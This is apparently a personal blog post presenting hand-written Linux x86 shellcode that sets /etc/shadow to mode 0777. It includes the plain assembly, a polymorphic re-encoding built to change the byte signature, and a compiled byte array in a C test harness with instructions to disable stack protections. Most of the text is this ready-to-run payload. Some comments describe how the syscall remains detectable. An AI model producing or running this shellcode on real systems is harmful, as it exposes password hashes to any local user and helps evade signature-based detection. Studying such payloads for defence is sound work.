Chmod 0777 Polymorphic Shellcode

This is my first hand-written shellcode for Linux, which I wrote for fun and exploration. I am a bit new to shellcoding in *nix environments. This shellcode changes the permissions of the shadow file on a linux/x86 system to 0777. According to the Linux programmer’s manual, chmod takes two arguments.
[code language=”c”]
#include <sys/stat.h>

/* Prototype quoted from chmod(2): path names the file, mode is the new permission bits.
 * Returns 0 on success and -1 on error. */
int chmod(const char *path, mode_t mode);
[/code]

The char pointer path needs to be our path to the file, and the mode is our file permissions. We need to calculate it by ORing the permission bits. Since we need to set it to 0777, which is an octal value, the hexadecimal value is 1FF. This is my original assembly code. According to the x86 syscall table, the syscall number for chmod is 15.

[code language=”c”]
; chmod("//etc/shadow", 0777) through the 32-bit Linux int 0x80 interface.
; Syntax: NASM (Intel operand order). Target: linux/x86, 32-bit.
; Registers at the syscall: eax = 15 (chmod, per the syscall table cited in
; the text), ebx = pointer to the path string, cx = mode.
; The kernel only honours the call if the process may change the file's mode,
; which for /etc/shadow typically means it is running as root.
; Review note: the observable behaviour is a chmod syscall naming /etc/shadow
; from a process that has no reason to touch it; syscall auditing or
; file-integrity monitoring on that path sees it however the bytes are encoded.
section .text
global _start

_start:
xor eax,eax                 ; eax = 0
push dword eax              ; four zero bytes: the NUL terminator of the path
push dword 0x776f6461       ; "adow" (bytes 61 64 6f 77 in memory, little-endian)
push dword 0x68732f63       ; "c/sh"
push dword 0x74652f2f       ; "//et" -> stack now holds "//etc/shadow\0"
mov ebx, esp                ; ebx = address of the path (first syscall argument)
push word 0x1ff             ; 0x1ff = octal 0777
pop cx                      ; cx = mode; only the low 16 bits of ecx are written here
mov al,0xf                  ; eax = 15, because the upper bytes were zeroed above
int 0x80                    ; issue the syscall; nothing follows, so this code neither returns nor exits
[/code]

This is my polymorphic version, in which I have changed the original code while retaining the functionality.

[code language=”c”]
; Title: chmod 0777 /etc/shadow Polymorphic Shellcode – 51 Bytes
; Platform: linux/x86
; Date: 2014-06-22
; Author: Osanda Malith Jayathissa (@OsandaMalith)

; Re-encoded variant of the chmod(path, 0777) payload: same syscall, same
; arguments, different instruction bytes.
; Syntax: NASM (Intel operand order). Target: linux/x86, 32-bit.
; Differences from the plain version visible in this listing:
;   - eax is zeroed with mov/xor instead of xor eax,eax
;   - the dword "adow" is produced by an addition instead of appearing literally
;   - the path is stored with esp-relative moves instead of pushes, and is
;     spelled "/etc//shadow" (the plain version builds "//etc/shadow")
; Review note: only the byte pattern changes. The process still issues chmod
; (syscall 15) on the shadow file, so detection keyed on that syscall and path,
; or on a mode change of /etc/shadow, is unaffected by the re-encoding.
section .text
global _start

_start:
mov ebx, eax                        ; copy eax so the next xor cancels it
xor eax, ebx                        ; eax ^ eax = 0
push dword eax                      ; four zero bytes: the NUL terminator of the path
mov esi, 0x563a1f3e                 ; first addend
add esi, 0x21354523                 ; esi = 0x776f6461 = "adow"
mov dword [esp-4], esi              ; stores go below esp, into stack not yet reserved
mov dword [esp-8], 0x68732f2f       ; "//sh"
mov dword [esp-12], 0x6374652f      ; "/etc"
sub esp, 12                         ; move esp down over the 12 bytes just written
mov ebx,esp                         ; ebx = address of "/etc//shadow\0" (first syscall argument)
push word 0x1ff                     ; 0x1ff = octal 0777
pop cx                              ; cx = mode; only the low 16 bits of ecx are written here
mov al,0xf                          ; eax = 15 (chmod), upper bytes already zero
int 0x80                            ; issue the syscall; nothing follows, so this code neither returns nor exits

[/code]

This is the C skeleton file with which you can test it. Compile it with the -fno-stack-protector and -z execstack arguments to gcc so that it can execute.

[code language=”C”]
/*
; Title: chmod 0777 /etc/shadow Polymorphic Shellcode – 51 Bytes
; Platform: linux/x86
; Date: 2014-06-22
; Author: Osanda Malith Jayathissa (@OsandaMalith)

section .text
global _start

_start:
mov ebx, eax
xor eax, ebx
push dword eax
mov esi, 0x563a1f3e
add esi, 0x21354523
mov dword [esp-4], esi
mov dword [esp-8], 0x68732f2f
mov dword [esp-12], 0x6374652f
sub esp, 12
mov ebx,esp
push word 0x1ff
pop cx
mov al,0xf
int 0x80

*/

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
"\x3a\x56\x81\xc6\x23\x45\x35\x21"
"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
"\x2f\x65\x74\x63\x83\xec\x0c\x89"
"\xe3\x66\x68\xff\x01\x66\x59\xb0"
"\x0f\xcd\x80";

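/*
 * Test harness for the byte array `code`: prints its length, then calls the
 * array as if it were a function.
 *
 * Effect when run: the payload issues chmod(path, 0777) on the shadow file.
 * With root privileges that call succeeds and /etc/shadow on the machine
 * running the test ends up mode 0777; without them the syscall fails.
 *
 * The payload ends at `int 0x80` and contains no ret instruction, so control
 * is not expected to come back to this function after ret() is called.
 *
 * Returns 0, if execution ever reaches the return statement.
 */
int
main() {
    /*
     * strlen() returns size_t, so it is printed with %zu; the original %d
     * mismatched the argument type. The cast is needed because strlen()
     * takes const char * and `code` is an unsigned char array.
     */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* Reinterpret the data array as a function pointer and jump into it. */
    int (*ret)() = (int(*)())code;
    ret();

    return 0;
}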
[/code]

http://packetstormsecurity.com/files/127180/Linux-x86-chmod-0777-etc-shadow-Polymorphic-Shellcode.html
